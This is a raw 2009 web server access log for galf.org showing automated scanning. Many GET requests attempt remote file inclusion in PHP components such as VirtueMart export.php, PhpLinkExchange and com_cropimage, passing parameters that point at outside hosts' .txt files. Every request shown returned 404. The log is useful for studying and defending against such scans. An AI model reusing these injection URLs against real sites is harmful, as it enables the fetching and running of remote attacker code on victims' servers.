118.107.162.36 - - [23/Nov/2009:05:40:13 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:30 -0800] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:40 -0800] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:49 -0800] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:44:58 -0800] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:51 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:58 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:59 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:45:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:46:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:46:03 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:46:08 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:46:17 -0800] "GET /logs/access_090831.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:46:21 -0800] "GET /logs/access_090413.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:46:34 -0800] "GET /logs/access_090817.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:46:57 -0800] "GET /logs/access_090831.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:47:27 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:47:31 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:47:34 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:47:36 -0800] "GET /logs/access_090831.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:47:41 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.95.231.98 - - [23/Nov/2009:05:48:10 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:05:48:10 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:05:48:10 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:48:54 -0800] "GET /index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:48:54 -0800] "GET /logs/index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:48:54 -0800] "GET /logs/access_090622.log%20%20/index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:49:10 -0800] "GET /logs/access_090525.log//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:49:10 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:49:10 -0800] "GET /logs/access_091019.log//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:49:10 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:49:25 -0800] "GET /index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:49:25 -0800] "GET /logs/access_090622.log%20%20/index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:49:26 -0800] "GET /logs/index2.php?x=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:49:48 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:49:48 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:49:48 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.9.225.71 - - [23/Nov/2009:05:50:47 -0800] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:50:47 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.9.225.71 - - [23/Nov/2009:05:50:51 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://jahanradio.com/plugins/editors/jce/tiny_mce/plugins/popup/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:04 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:10 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:10 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:51:10 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:22 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:22 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:22 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:48 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:50 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:52 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:53 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:53 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:54 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:54 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:54 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:55 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:55 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:55 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:55 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:56 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:51:56 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:52:01 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:52:01 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:52:46 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:05:52:50 -0800] "GET /logs/access_091102.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:52:56 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:05:53:00 -0800] "GET /logs/access_091026.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:53:48 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:53:54 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:55 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:56 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:56 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:57 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:53:57 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:53:57 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:53:58 -0800] "GET /tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:05:53:59 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:05:53:59 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [23/Nov/2009:05:54:07 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:54:07 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [23/Nov/2009:05:54:09 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:14 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:14 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:14 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:20 -0800] "GET /logs/access_090615.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:31 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:31 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:54:36 -0800] "GET /logs/access_090615.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:54:59 -0800] "GET /tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:54:59 -0800] "GET /logs/access_090713.log%20%20//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:55:00 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:55:38 -0800] "GET /logs//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:55:39 -0800] "GET /trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [23/Nov/2009:05:55:41 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=ko&page=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
